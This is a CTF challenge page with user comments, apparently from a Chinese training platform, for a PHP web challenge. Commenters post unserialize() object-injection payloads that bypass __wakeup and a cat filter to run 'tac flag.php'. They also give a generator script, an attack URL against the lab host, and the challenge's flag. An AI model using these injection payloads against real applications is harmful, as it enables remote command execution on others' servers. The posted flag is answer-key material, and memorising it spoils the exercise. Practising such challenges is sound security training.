安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2135
提  示:
描  述:
flag{}
评论
18956160518 1年前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 1

EtHat 1年前

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

xht0525 2年前

nl flag.php|base64

回复 0

不会编程的崽 2年前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 2年前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 2年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 2年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 2年前

flag{Unser1alize_and_2CE_Add}

回复 0

yuanyipaceandlove 2年前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

15683956189 2年前

特别要注意下url编码的问题

回复 0

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

Subufan 攻破了该题 8小时前
blueboat 攻破了该题 3天前
soha 攻破了该题 4天前
hjm123 攻破了该题 5天前
SDLbyZ 攻破了该题 8天前
5883120xly 攻破了该题 10天前
ucole 攻破了该题 14天前
17807032991 攻破了该题 16天前
DZcoming 攻破了该题 17天前
xjuqq 攻破了该题 18天前
ctf88 攻破了该题 22天前
flag与她皆失 攻破了该题 24天前
xiaobai19860830 攻破了该题 26天前
zy07020304 攻破了该题 26天前
凑友希那 攻破了该题 29天前
lplum 攻破了该题 29天前
fanthan 攻破了该题 1月前
秋天在哪 攻破了该题 1月前
Future92 攻破了该题 1月前
猪猪侠开火箭 攻破了该题 1月前
问题反馈